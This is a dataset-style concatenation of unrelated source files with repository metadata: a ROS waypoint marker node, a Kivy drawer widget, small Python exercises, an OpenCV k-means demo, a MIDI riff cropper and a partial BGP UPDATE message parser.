        for waypoint in waypoints:
            pose = self.waypoint_to_pose(waypoint)
            pose_array.poses.append(pose.pose)
        return pose_array
    # ---
    # Waypoint visualization
    # ---
    def all_waypoints_to_markers(self):
        """Rebuild the marker pose cache from waypoint_config."""
        self.marker_poses = OrderedDict()
        for name, waypoint in self.waypoint_config.items():
            self.marker_poses[name] = self.waypoint_to_pose(waypoint)
        self.update_markers()
    def add_marker(self, name, pose):
        self.marker_poses[name] = pose
        self.update_markers()
    def delete_marker(self, name):
        self.marker_poses.pop(name)
        self.update_markers()
    def update_markers(self):
        """Regenerate the MarkerArray: one arrow and one text label per waypoint."""
        self.markers = MarkerArray()
        for name, pose in self.marker_poses.items():
            position_marker = self.make_marker(name, pose)
            text_marker = self.make_marker(name, pose)
            self.prep_position_marker(position_marker)
            text_marker.type = Marker.TEXT_VIEW_FACING
            text_marker.ns = "text" + text_marker.ns
            text_marker.text = name
            # scale.x/y are ignored for TEXT_VIEW_FACING; scale.z sets text height
            text_marker.scale.x = 0.0
            text_marker.scale.y = 0.0
            self.markers.markers.append(position_marker)
            self.markers.markers.append(text_marker)
    def prep_position_marker(self, position_marker):
        """Turn a generic marker into a semi-transparent arrow of length
        marker_size pointing along the waypoint's heading."""
        position_marker.type = Marker.ARROW
        position_marker.ns = "pos" + position_marker.ns
        position_marker.color.a = 0.75
        position_marker.scale.x = self.marker_size / 4.0
        position_marker.scale.y = self.marker_size / 2.5
        position_marker.scale.z = self.marker_size / 2.0
        p1 = geometry_msgs.msg.Point()
        p2 = geometry_msgs.msg.Point()
        p2.x = self.marker_size
        position_marker.points.append(p1)
        position_marker.points.append(p2)
    def make_marker(self, name, pose):
        # name: str, marker name
        # pose: geometry_msgs.msg.PoseStamped
        marker = Marker()
        marker.action = Marker.ADD
        marker.pose = pose.pose
        marker.header.frame_id = self.map_frame
        marker.lifetime = rospy.Duration(1.0)  # seconds
        marker.ns = name
        marker.id = 0  # all waypoint names should be unique
        scale_vector = geometry_msgs.msg.Vector3()
        scale_vector.x = self.marker_size
        scale_vector.y = self.marker_size
        scale_vector.z = self.marker_size
        marker.scale = scale_vector
        marker.color = ColorRGBA(
            r=self.marker_color[0],
            g=self.marker_color[1],
            b=self.marker_color[2],
            a=self.marker_color[3],
        )
        return marker
    def publish_markers(self):
        if len(self.markers.markers) != 0:
            self.marker_pub.publish(self.markers)
    # ---
    # Run
    # ---
    def run(self):
        """Publish markers at 3 Hz until shutdown."""
        rate = rospy.Rate(3.0)
        while not rospy.is_shutdown():
            self.publish_markers()
            rate.sleep()
rate.sleep()
def main():
    """Construct the waypoints node and spin until ROS shuts down."""
    node = TJ2RomiWaypoints()
    try:
        node.run()
    except rospy.ROSInterruptException:
        pass
    finally:
        rospy.loginfo("Exiting %s node" % node.node_name)
if __name__ == "__main__":
    main()
| [
"woz4tetra@gmail.com"
] | woz4tetra@gmail.com |
4d6a87ecdb5ea24eb88b724c2eb6a34cebff36f0 | fe31c3cb21bac1cf7d06bb8dbb00ad7c09994403 | /afternoon_python/venv/Tuples_Lists_Dictionaries.py | 48f7408d63dc1905bd9303656c8225f857ddf067 | [] | no_license | bsakari/Python-Projects | 87718827daa9ff4ac16bf0855e04cadef329aa1d | 41104d8d1df84c27255f2d221ff68f219de8c84f | refs/heads/master | 2020-03-21T03:16:42.332439 | 2018-06-20T14:39:34 | 2018-06-20T14:39:34 | 138,045,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # () tuple Cannot be updated
# [] list        mutable: items can be reassigned in place
# {} with bare, comma-separated values builds a *set*, not a dictionary
#    (a dict needs key: value pairs). Sets are mutable but unordered,
#    so they do not support indexing or slicing.
name1 = ("King","mimi","wewe",9,2.5,("two",7,2.5,"yes"))
# print(name1)
# print(name1[5])
# print(name1[0:4])
# print(name1[1:])
name2 = ["King","mimi","wewe",9,2.5,("two",7,2.5,"yes")]
print(name2)
# print(name2[5])
# print(name2[0:4])
# print(name2[1:])
# Lists support item assignment (tuples and sets do not):
name2[0] = "Mfalme"
print(name2)
# name3 is a set: iteration order is arbitrary, and the commented-out
# indexing/slicing lines below would raise TypeError if run.
name3 = {"King","mimi","wewe",9,2.5,("two",7,2.5,"yes")}
print(name3)
# print(name3[5])
# print(name3[0:4])
# print(name3[1:])
| [
"sakaribenjamin@gmail.com"
] | sakaribenjamin@gmail.com |
389026db81519bc1f589892bb1a1714505a3b1ed | 5068bc927a7fff73923ce95862ff70120160c491 | /electrum_axe/gui/kivy/uix/drawer.py | d94e14494f89c86ae344d59ee0b866ca609fc9ea | [
"MIT"
] | permissive | AXErunners/electrum-axe | cdbce2dbb92e23e32e9f9b733ae9f65f51c0ae9f | 7ef05088c0edaf0688fb167df353d6da619ebf2f | refs/heads/master | 2021-04-03T09:40:37.109317 | 2020-08-27T16:53:18 | 2020-08-27T16:53:18 | 124,705,752 | 336 | 75 | MIT | 2020-10-17T18:30:25 | 2018-03-10T23:00:48 | Python | UTF-8 | Python | false | false | 8,494 | py | '''Drawer Widget to hold the main window and the menu/hidden section that
can be swiped in from the left. This Menu would be only hidden in phone mode
and visible in Tablet Mode.
This class is specifically in lined to save on start up speed(minimize i/o).
'''
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import OptionProperty, NumericProperty, ObjectProperty
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.logger import Logger
import gc
# delayed imports
app = None
class Drawer(Factory.RelativeLayout):
    '''Drawer Widget to hold the main window and the menu/hidden section that
    can be swiped in from the left. This Menu would be only hidden in phone mode
    and visible in Tablet Mode.
    '''

    state = OptionProperty('closed',
                            options=('closed', 'open', 'opening', 'closing'))
    '''This indicates the current state the drawer is in.

    :attr:`state` is a `OptionProperty` defaults to `closed`. Can be one of
    `closed`, `open`, `opening`, `closing`.
    '''

    scroll_timeout = NumericProperty(200)
    '''Timeout allowed to trigger the :data:`scroll_distance`,
    in milliseconds. If the user has not moved :data:`scroll_distance`
    within the timeout, the scrolling will be disabled and the touch event
    will go to the children.

    :data:`scroll_timeout` is a :class:`~kivy.properties.NumericProperty`
    and defaults to 200 (milliseconds)
    '''

    scroll_distance = NumericProperty('9dp')
    '''Distance to move before scrolling the :class:`Drawer` in pixels.
    As soon as the distance has been traveled, the :class:`Drawer` will
    start to scroll, and no touch event will go to children.
    It is advisable that you base this value on the dpi of your target
    device's screen.

    :data:`scroll_distance` is a :class:`~kivy.properties.NumericProperty`
    and defaults to 20dp.
    '''

    drag_area = NumericProperty('9dp')
    '''The percentage of area on the left edge that triggers the opening of
    the drawer. from 0-1

    :attr:`drag_area` is a `NumericProperty` defaults to 2
    '''

    hidden_widget = ObjectProperty(None)
    ''' This is the widget that is hidden in phone mode on the left side of
    drawer or displayed on the left of the overlay widget in tablet mode.

    :attr:`hidden_widget` is a `ObjectProperty` defaults to None.
    '''

    overlay_widget = ObjectProperty(None)
    '''This a pointer to the default widget that is overlayed either on top or
    to the right of the hidden widget.
    '''

    def __init__(self, **kwargs):
        super(Drawer, self).__init__(**kwargs)
        # NOTE(review): attribute name is misspelled ("triigger") but is used
        # consistently below; renaming would be a behavior-neutral refactor.
        self._triigger_gc = Clock.create_trigger(self._re_enable_gc, .2)

    def toggle_drawer(self):
        """Animate the overlay open or closed (phone mode only)."""
        if app.ui_mode[0] == 't':
            return
        Factory.Animation.cancel_all(self.overlay_widget)
        anim = Factory.Animation(x=self.hidden_widget.width
                                 if self.state in ('opening', 'closed') else 0,
                                 d=.1, t='linear')
        anim.bind(on_complete = self._complete_drawer_animation)
        anim.start(self.overlay_widget)

    def _re_enable_gc(self, dt):
        # Re-enable garbage collection after the interaction settles.
        global gc
        gc.enable()

    def on_touch_down(self, touch):
        # Grab touches that start inside the drag area so a swipe can open
        # or close the drawer; everything else falls through to children.
        if self.disabled:
            return

        if not self.collide_point(*touch.pos):
            return

        touch.grab(self)

        # disable gc for smooth interaction
        # This is still not enough while wallet is synchronising
        # look into pausing all background tasks while ui interaction like this
        gc.disable()
        global app
        if not app:
            app = App.get_running_app()

        # skip on tablet mode
        if app.ui_mode[0] == 't':
            return super(Drawer, self).on_touch_down(touch)

        state = self.state
        touch.ud['send_touch_down'] = False
        start = 0 #if state[0] == 'c' else self.hidden_widget.right
        drag_area = self.drag_area\
            if self.state[0] == 'c' else\
            (self.overlay_widget.x)

        if touch.x < start or touch.x > drag_area:
            if self.state == 'open':
                self.toggle_drawer()
                return
            return super(Drawer, self).on_touch_down(touch)

        self._touch = touch
        # If the touch doesn't move far enough within scroll_timeout,
        # _change_touch_mode hands the event back to the children.
        Clock.schedule_once(self._change_touch_mode,
                            self.scroll_timeout/1000.)
        touch.ud['in_drag_area'] = True
        touch.ud['send_touch_down'] = True
        return

    def on_touch_move(self, touch):
        if not touch.grab_current is self:
            return
        self._touch = False
        # skip on tablet mode
        if app.ui_mode[0] == 't':
            return super(Drawer, self).on_touch_move(touch)

        if not touch.ud.get('in_drag_area', None):
            return super(Drawer, self).on_touch_move(touch)

        # Track the finger: overlay x is clamped to [0, hidden_widget.width].
        ov = self.overlay_widget
        ov.x=min(self.hidden_widget.width,
                 max(ov.x + touch.dx*2, 0))

        #_anim = Animation(x=x, duration=1/2, t='in_out_quart')
        #_anim.cancel_all(ov)
        #_anim.start(ov)

        if abs(touch.x - touch.ox) < self.scroll_distance:
            return

        touch.ud['send_touch_down'] = False
        Clock.unschedule(self._change_touch_mode)
        self._touch = None
        self.state = 'opening' if touch.dx > 0 else 'closing'
        touch.ox = touch.x
        return

    def _change_touch_mode(self, *args):
        # Timeout expired without a drag: release the grab and replay the
        # touch as a normal event for the children.
        if not self._touch:
            return
        touch = self._touch
        touch.ungrab(self)
        touch.ud['in_drag_area'] = False
        touch.ud['send_touch_down'] = False
        self._touch = None
        super(Drawer, self).on_touch_down(touch)
        return

    def on_touch_up(self, touch):
        if not touch.grab_current is self:
            return

        self._triigger_gc()

        touch.ungrab(self)
        touch.grab_current = None

        # skip on tablet mode
        get = touch.ud.get
        if app.ui_mode[0] == 't':
            return super(Drawer, self).on_touch_up(touch)

        # NOTE(review): old_x is reset to constants just before computing
        # speed, so speed is always 0 here — looks like leftover code.
        self.old_x = [1, ] * 10
        self.speed = sum((
            (self.old_x[x + 1] - self.old_x[x]) for x in range(9))) / 9.

        if get('send_touch_down', None):
            # touch up called before moving
            Clock.unschedule(self._change_touch_mode)
            self._touch = None
            Clock.schedule_once(
                lambda dt: super(Drawer, self).on_touch_down(touch))
        if get('in_drag_area', None):
            if abs(touch.x - touch.ox) < self.scroll_distance:
                # Small movement: snap back to the nearest resting position.
                anim_to = (0 if self.state[0] == 'c'
                           else self.hidden_widget.width)
                Factory.Animation(x=anim_to, d=.1).start(self.overlay_widget)
                return
            touch.ud['in_drag_area'] = False
            if not get('send_touch_down', None):
                self.toggle_drawer()
        Clock.schedule_once(lambda dt: super(Drawer, self).on_touch_up(touch))

    def _complete_drawer_animation(self, *args):
        self.state = 'open' if self.state in ('opening', 'closed') else 'closed'

    def add_widget(self, widget, index=1):
        # First widget goes into the hidden (menu) side, second into the
        # overlay; any further widgets are discarded with a debug message.
        if not widget:
            return

        iget = self.ids.get
        if not iget('hidden_widget') or not iget('overlay_widget'):
            super(Drawer, self).add_widget(widget)
            return

        if not self.hidden_widget:
            self.hidden_widget = self.ids.hidden_widget
        if not self.overlay_widget:
            self.overlay_widget = self.ids.overlay_widget

        if self.overlay_widget.children and self.hidden_widget.children:
            Logger.debug('Drawer: Accepts only two widgets. discarding rest')
            return

        if not self.hidden_widget.children:
            self.hidden_widget.add_widget(widget)
        else:
            self.overlay_widget.add_widget(widget)
            widget.x = 0

    def remove_widget(self, widget):
        if self.overlay_widget.children[0] == widget:
            self.overlay_widget.clear_widgets()
            return
        # NOTE(review): compares the widget against the children *list*;
        # confirm whether `widget in self.hidden_widget.children` was intended.
        if widget == self.hidden_widget.children:
            self.hidden_widget.clear_widgets()
            return

    def clear_widgets(self):
        self.overlay_widget.clear_widgets()
        self.hidden_widget.clear_widgets()
if __name__ == '__main__':
    from kivy.app import runTouchApp
    from kivy.lang import Builder
    # Minimal manual demo: a Drawer holding two Buttons (hidden + overlay).
    # NOTE(review): the second child is written as `Button` without a trailing
    # colon — confirm the kv parser accepts that form; `Button:` is the usual one.
    runTouchApp(Builder.load_string('''
Drawer:
    Button:
    Button
'''))
| [
"slowdive@me.com"
] | slowdive@me.com |
5eff08a2a8ac3d7eb32d009fdf49681a45178538 | 6874be4a1382a7a79af829f733155cc1e33f2733 | /numstring.py | 9e352c04a1dca353cb2401c5450b88774f986d4b | [] | no_license | LawerenceLee/classes_PY | 9028604ef835aae8099658c7edfe6b509827e5ce | 440a0efff6ed4cb58a2d7b11e6cc86f49373b0af | refs/heads/master | 2021-07-10T06:34:13.537879 | 2017-10-10T22:09:24 | 2017-10-10T22:09:24 | 106,476,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | class NumString:
def __init__(self, value):
self.value = str(value)
def __str__(self):
return self.value
def __int__(self):
return int(self.value)
def __float__(self):
return float(self.value)
def __add__(self, other):
if '.' in self.value:
return float(self) + other
return int(self) + other
def __radd__(self, other):
return self + other
def __iadd__(self, other):
self.valve = self + other
return self.value | [
"lucifitz.edward@gmail.com"
] | lucifitz.edward@gmail.com |
2775ffa54c0bc23d1d71871ec34631d79c86c5d8 | ee3039b27532d09c0c435ea7b92e29c70246c66e | /opencv/learnOpencv/091-120/110-KMeans进行数据分类.py | 29e53c58acf946e676b6778afd44438e05fed344 | [] | no_license | Alvazz/fanfuhan_ML_OpenCV | e8b37acc406462b9aaca9c5e6844d1db5aa3c944 | dacfdaf87356e857d3ff18c5e0a4fd5a50855324 | refs/heads/master | 2022-04-05T06:15:31.778227 | 2020-02-07T01:40:07 | 2020-02-07T01:40:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | """
KMeans进行数据分类
"""
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
X = np.random.randint(25, 50, (25, 2))
Y = np.random.randint(60, 85, (25, 2))
pts = np.vstack((X, Y))
# 初始化数据
data = np.float32(pts)
print(data.shape)
# 定义停止条件
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# kmeans分类
ret, label, center = cv.kmeans(data, 2, None, criteria, 2, cv.KMEANS_RANDOM_CENTERS)
print(label.shape)
print(center)
# 获取不同标签的点
A = data[label.ravel() == 0]
B = data[label.ravel() == 1]
# plot the data
plt.scatter(A[:, 0], A[:, 1])
plt.scatter(B[:, 0], B[:, 1], c='r')
plt.scatter(center[:, 0], center[:, 1], s=80, c='y', marker='s')
plt.xlabel("x1")
plt.ylabel("x2")
plt.show()
cv.waitKey(0)
cv.destroyAllWindows() | [
"gitea@fake.local"
] | gitea@fake.local |
e0080d15f3124eb2541946e99066319f21c9cf29 | e20f478e1ea049e9539c4cbe5535338649651a28 | /music/process/crop.py | 4408f6423f9c18727674889669633690352de910 | [] | no_license | josephding23/RiffGAN | dde35d3f31f8e21d3a1a17ae958085dd8a752163 | f3850a22281fe8344d0db18919f3301d7bc9b55d | refs/heads/master | 2022-12-08T20:26:36.250666 | 2020-09-03T08:17:37 | 2020-09-03T08:17:37 | 269,524,888 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from dataset.grunge_library import *
from music.db_fragments.riff import *
import os
def crop_riffs():
    """Split every guitar and bass riff MIDI in the library into per-measure
    files and register each fragment in the matching unit-riff table."""
    # The guitar and bass paths were exact duplicates; both now share one helper.
    _crop_riff_table(get_guitar_riff_table(), get_unit_guitar_riff_table(), GuitarRiff)
    _crop_riff_table(get_bass_riff_table(), get_unit_bass_riff_table(), BassRiff)


def _crop_riff_table(riff_table, unit_table, riff_cls):
    """Crop every riff document in *riff_table* measure by measure.

    Each cropped measure is written into a directory named after the source
    file (its path minus the '.mid' extension) and inserted into *unit_table*
    together with that measure's tonality.

    riff_cls: class used to load a riff from a path (GuitarRiff or BassRiff).
    """
    for riff_doc in riff_table.find():
        measures_tonality = riff_doc['MeasuresTonality']
        path = riff_doc['Path']
        riff = riff_cls(path)
        cropped_riffs = riff.crop_by_measure()

        # Output directory: source path with the '.mid' extension stripped.
        if not os.path.exists(path[:-4]):
            os.mkdir(path[:-4])

        for measure in range(riff.measures_num):
            cropped = cropped_riffs[measure]
            save_path = path[:-4] + '/' + str(measure) + '.mid'
            cropped.write(save_path)
            unit_table.insert_one({
                'Performer': riff_doc['Performer'],
                'Album': riff_doc['Album'],
                'Song': riff_doc['Song'],
                'Path': save_path,
                'Tonality': measures_tonality[measure]
            })
def test_crop():
    """Ad-hoc manual check: crop one known riff file into per-measure MIDIs."""
    path = 'E:/grunge_library/Soundgarden/Superunknown/03 - Fell on Black Days/RIFF/4.mid'
    guitar_riff = GuitarRiff(path)
    cropped_riffs = guitar_riff.crop_by_measure()
    # Robustness fix: the original unconditional os.mkdir raised
    # FileExistsError on re-runs; guard it like crop_riffs does.
    if not os.path.exists(path[:-4]):
        os.mkdir(path[:-4])
    for measure in range(guitar_riff.measures_num):
        cropped = cropped_riffs[measure]
        cropped.write(path[:-4] + '/' + str(measure) + '.mid')
# Entry point: crop the whole library when run as a script.
if __name__ == '__main__':
    crop_riffs()
"dingzhx@vip.qq.com"
] | dingzhx@vip.qq.com |
386d192a0ec7ee09139f82edbcdcc3242ee5d609 | 4766d241bbc736e070f79a6ae6a919a8b8bb442d | /archives/leetcode/0380. Insert Delete GetRandom O(1).py | 49e6f76ec6d3d7f929204d444413ca284bb1fee3 | [] | no_license | yangzongwu/leetcode | f7a747668b0b5606050e8a8778cc25902dd9509b | 01f2edd79a1e922bfefecad69e5f2e1ff3a479e5 | refs/heads/master | 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | '''
Design a data structure that supports all following operations in average O(1) time.
insert(val): Inserts an item val to the set if not already present.
remove(val): Removes an item val from the set if present.
getRandom: Returns a random element from current set of elements. Each element must have the same probability of being returned.
Example:
// Init an empty set.
RandomizedSet randomSet = new RandomizedSet();
// Inserts 1 to the set. Returns true as 1 was inserted successfully.
randomSet.insert(1);
// Returns false as 2 does not exist in the set.
randomSet.remove(2);
// Inserts 2 to the set, returns true. Set now contains [1,2].
randomSet.insert(2);
// getRandom should return either 1 or 2 randomly.
randomSet.getRandom();
// Removes 1 from the set, returns true. Set now contains [2].
randomSet.remove(1);
// 2 was already in the set, so return false.
randomSet.insert(2);
// Since 2 is the only number in the set, getRandom always return 2.
randomSet.getRandom();
'''
class RandomizedSet(object):
    """Set supporting insert, remove, and getRandom in average O(1) time.

    datalist holds the values; datadict maps each value to its index in
    datalist so that membership tests and removals avoid list scans.
    """

    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.datalist = []
        self.datadict = {}

    def insert(self, val):
        """
        Inserts a value to the set. Returns true if the set did not already contain the specified element.
        :type val: int
        :rtype: bool
        """
        if val in self.datadict:
            return False
        self.datadict[val] = len(self.datalist)
        self.datalist.append(val)
        return True

    def remove(self, val):
        """
        Removes a value from the set. Returns true if the set contained the specified element.
        :type val: int
        :rtype: bool
        """
        # Bug fix: membership is now tested against the dict (O(1)); the
        # original scanned the list (O(n)), defeating the O(1) requirement.
        if val not in self.datadict:
            return False
        idx = self.datadict.pop(val)
        last_val = self.datalist.pop()
        if idx < len(self.datalist):
            # Move the former tail element into the vacated slot so the
            # removal stays O(1) regardless of position.
            self.datalist[idx] = last_val
            self.datadict[last_val] = idx
        return True

    def getRandom(self):
        """
        Get a random element from the set.
        :rtype: int
        """
        return random.choice(self.datalist)
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
| [
"noreply@github.com"
] | yangzongwu.noreply@github.com |
38b7bdf38f9e8eff00eaac099e6aff6c113b5c29 | 057fde8a8ab9622a3524cb880c7ace5a15c0f355 | /set12/116.py | 544622ad13b6a605b28c5b6947e4a09f425bdcfc | [] | no_license | ramyasutraye/Guvi_Python | e9ba6eb812ec8014214dce77d710ce230bbb8020 | 2fed3c460185fbf7bcf64c068084bcdb7d840140 | refs/heads/master | 2020-04-23T19:30:21.003061 | 2018-05-25T10:43:14 | 2018-05-25T10:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | n=int(input("Enter n value:"))
# Read k from stdin, then echo n and k concatenated with no separator.
k = int(input("Enter k value:"))
print("{0}{1}".format(n, k))
| [
"noreply@github.com"
] | ramyasutraye.noreply@github.com |
cf990863204d3924096ace3258291586735811b1 | d5813a3017818b5dff54d283e3ba9a0ceaf5cea9 | /yabgp/message/update.py | d117131e8d6bc8ac7fc3338709e7be2dce1ce6b9 | [
"Apache-2.0"
] | permissive | trungdtbk/yabgp | 12244fa7b23f56951d2a839e0c1706d74d478bd6 | 19850134d1a95f008be4416e495629aa659b55bb | refs/heads/master | 2021-01-22T04:24:31.924393 | 2017-02-10T12:15:33 | 2017-02-10T12:15:33 | 81,541,694 | 0 | 0 | null | 2017-02-10T07:59:27 | 2017-02-10T07:59:27 | null | UTF-8 | Python | false | false | 19,649 | py | # Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""BGP Update Message"""
import struct
import traceback
import logging
import binascii
import netaddr
from yabgp.common import exception as excep
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute import AttributeFlag
from yabgp.message.attribute.origin import Origin
from yabgp.message.attribute.aspath import ASPath
from yabgp.message.attribute.nexthop import NextHop
from yabgp.message.attribute.med import MED
from yabgp.message.attribute.localpref import LocalPreference
from yabgp.message.attribute.atomicaggregate import AtomicAggregate
from yabgp.message.attribute.aggregator import Aggregator
from yabgp.message.attribute.community import Community
from yabgp.message.attribute.originatorid import OriginatorID
from yabgp.message.attribute.clusterlist import ClusterList
from yabgp.message.attribute.mpreachnlri import MpReachNLRI
from yabgp.message.attribute.mpunreachnlri import MpUnReachNLRI
from yabgp.message.attribute.extcommunity import ExtCommunity
from yabgp.message.attribute.pmsitunnel import PMSITunnel
from yabgp.message.attribute.linkstate.linkstate import LinkState
LOG = logging.getLogger()
class Update(object):
    """
    An UPDATE message is used to advertise feasible routes that share
    common path attributes to a peer, or to withdraw multiple unfeasible
    routes from service (RFC 4271 page 15)
    """

    def __init__(self):
        """
        Wire layout of a BGP UPDATE message body (RFC 4271, section 4.3):

        +----------------------------------------------------+
        | Withdrawn Routes Length (2 octets)                 |
        +----------------------------------------------------+
        | Withdrawn Routes (variable)                        |
        +----------------------------------------------------+
        | Total Path Attribute Length (2 octets)             |
        +----------------------------------------------------+
        | Path Attributes (variable)                         |
        +----------------------------------------------------+
        | Network Layer Reachability Information (variable)  |
        +----------------------------------------------------+
        @ Withdrawn Routes Length:
        This 2-octets unsigned integer indicates the total length of
        the Withdrawn Routes field in octets. Its value allows the
        length of the Network Layer Reachability Information field to
        be determined, as specified below.
        A value of 0 indicates that no routes are being withdrawn from
        service, and that the WITHDRAWN ROUTES field is not present in
        this UPDATE message.
        @ Withdrawn Routes:
        This is a variable-length field that contains a list of IP
        address prefixes for the routes that are being withdrawn from
        service. Each IP address prefix is encoded as a 2-tuple of the
        form <length, prefix>, whose fields are described below:
        +---------------------------+
        | Length (1 octet)          |
        +---------------------------+
        | Prefix (variable)         |
        +---------------------------+
        The use and the meaning of these fields are as follows:
        a) Length:
        The Length field indicates the length in bits of the IP
        address prefix. A length of zero indicates a prefix that
        matches all IP addresses (with prefix, itself, of zero
        octets).
        b) Prefix:
        The Prefix field contains an IP address prefix, followed by
        the minimum number of trailing bits needed to make the end
        of the field fall on an octet boundary. Note that the value
        of trailing bits is irrelevant.
        @ Total Path Attribute Length:
        This 2-octet unsigned integer indicates the total length of the
        Path Attributes field in octets. Its value allows the length
        of the Network Layer Reachability field to be determined as
        specified below.
        A value of 0 indicates that neither the Network Layer
        Reachability Information field nor the Path Attribute field is
        present in this UPDATE message.
        @ Path Attributes:
        (path attributes details see RFC 4271 and some other RFCs)
        @ Network Layer Reachability Information:
        This variable length field contains a list of IP address
        prefixes. The length, in octets, of the Network Layer
        Reachability Information is not encoded explicitly, but can be
        calculated as:
        UPDATE message Length - 23 - Total Path Attributes Length
        - Withdrawn Routes Length
        where UPDATE message Length is the value encoded in the fixedsize
        BGP header, Total Path Attribute Length, and Withdrawn
        Routes Length are the values encoded in the variable part of
        the UPDATE message, and 23 is a combined length of the fixedsize
        BGP header, the Total Path Attribute Length field, and the
        Withdrawn Routes Length field.
        Reachability information is encoded as one or more 2-tuples of
        the form <length, prefix>, whose fields are described below:
        +---------------------------+
        | Length (1 octet)          |
        +---------------------------+
        | Prefix (variable)         |
        +---------------------------+
        The use and the meaning of these fields are as follows:
        a) Length:
        The Length field indicates the length in bits of the IP
        address prefix. A length of zero indicates a prefix that
        matches all IP addresses (with prefix, itself, of zero
        octets).
        b) Prefix:
        The Prefix field contains an IP address prefix, followed by
        enough trailing bits to make the end of the field fall on an
        octet boundary. Note that the value of the trailing bits is
        irrelevant.
        """

    @classmethod
    def parse(cls, t, msg_hex, asn4=False, add_path_remote=False, add_path_local=False):
        """
        Parse BGP Update message
        :param t: timestamp
        :param msg_hex: raw message
        :param asn4: support 4 bytes AS or not
        :param add_path_remote: if the remote peer can send add path NLRI
        :param add_path_local: if the local can send add path NLRI
        :return: message after parsing.
        """
        # NOTE(review): add_path_local is accepted but never read in this
        # method; only add_path_remote influences prefix parsing.
        results = {
            "withdraw": [],
            "attr": None,
            "nlri": [],
            'time': t,
            'hex': msg_hex,
            'sub_error': None,
            'err_data': None}
        # get every part of the update message
        # (2-byte withdrawn length, withdrawn routes, 2-byte attribute
        # length, path attributes, then NLRI as the remainder)
        withdraw_len = struct.unpack('!H', msg_hex[:2])[0]
        withdraw_prefix_data = msg_hex[2:withdraw_len + 2]
        attr_len = struct.unpack('!H', msg_hex[withdraw_len + 2:withdraw_len + 4])[0]
        attribute_data = msg_hex[withdraw_len + 4:withdraw_len + 4 + attr_len]
        nlri_data = msg_hex[withdraw_len + 4 + attr_len:]
        try:
            # parse withdraw prefixes
            results['withdraw'] = cls.parse_prefix_list(withdraw_prefix_data, add_path_remote)
            # parse nlri
            results['nlri'] = cls.parse_prefix_list(nlri_data, add_path_remote)
        except Exception as e:
            # malformed prefix field: record the RFC 4271 sub-error instead
            # of propagating, so attribute parsing below still runs
            LOG.error(e)
            error_str = traceback.format_exc()
            LOG.debug(error_str)
            results['sub_error'] = bgp_cons.ERR_MSG_UPDATE_INVALID_NETWORK_FIELD
            results['err_data'] = ''
        try:
            # parse attributes
            results['attr'] = cls.parse_attributes(attribute_data, asn4)
        except excep.UpdateMessageError as e:
            LOG.error(e)
            results['sub_error'] = e.sub_error
            results['err_data'] = e.data
        except Exception as e:
            LOG.error(e)
            error_str = traceback.format_exc()
            LOG.debug(error_str)
            results['sub_error'] = e
            results['err_data'] = e
        return results

    @classmethod
    def construct(cls, msg_dict, asn4=False, addpath=False):
        """construct BGP update message
        :param msg_dict: update message dictionary (keys: attr/nlri/withdraw)
        :param asn4: support 4 bytes asn or not
        :param addpath: support add path or not
        """
        attr_hex = b''
        nlri_hex = b''
        withdraw_hex = b''
        if msg_dict.get('attr'):
            attr_hex = cls.construct_attributes(msg_dict['attr'], asn4)
        if msg_dict.get('nlri'):
            nlri_hex = cls.construct_prefix_v4(msg_dict['nlri'], addpath)
        if msg_dict.get('withdraw'):
            withdraw_hex = cls.construct_prefix_v4(msg_dict['withdraw'], addpath)
        # NOTE(review): the first two branches build the exact same body
        # (zero withdrawn length + attributes + nlri, where nlri_hex is
        # empty in the second case); an update with neither attributes nor
        # withdraws returns None implicitly.
        if nlri_hex and attr_hex:
            msg_body = struct.pack('!H', 0) + struct.pack('!H', len(attr_hex)) + attr_hex + nlri_hex
            return cls.construct_header(msg_body)
        elif attr_hex and not nlri_hex:
            msg_body = struct.pack('!H', 0) + struct.pack('!H', len(attr_hex)) + attr_hex + nlri_hex
            return cls.construct_header(msg_body)
        elif withdraw_hex:
            msg_body = struct.pack('!H', len(withdraw_hex)) + withdraw_hex + struct.pack('!H', 0)
            return cls.construct_header(msg_body)

    @staticmethod
    def parse_prefix_list(data, addpath=False):
        """
        Parses an RFC4271 encoded blob of BGP prefixes into a list
        :param data: hex data
        :param addpath: support addpath or not
        :return: prefix_list (strings "a.b.c.d/len", or dicts with
            'prefix' and 'path_id' keys when addpath is on)
        """
        prefixes = []
        postfix = data
        while len(postfix) > 0:
            # for python2 and python3
            if addpath:
                # RFC 7911: a 4-byte path identifier precedes each prefix
                path_id = struct.unpack('!I', postfix[0:4])[0]
                postfix = postfix[4:]
            if isinstance(postfix[0], int):
                prefix_len = postfix[0]
            else:
                prefix_len = ord(postfix[0])
            if prefix_len > 32:
                LOG.warning('Prefix Length larger than 32')
                raise excep.UpdateMessageError(
                    sub_error=bgp_cons.ERR_MSG_UPDATE_INVALID_NETWORK_FIELD,
                    data=repr(data)
                )
            octet_len, remainder = int(prefix_len / 8), prefix_len % 8
            if remainder > 0:
                # prefix length doesn't fall on octet boundary
                octet_len += 1
            tmp = postfix[1:octet_len + 1]
            # for python2 and python3
            if isinstance(postfix[0], int):
                prefix_data = [i for i in tmp]
            else:
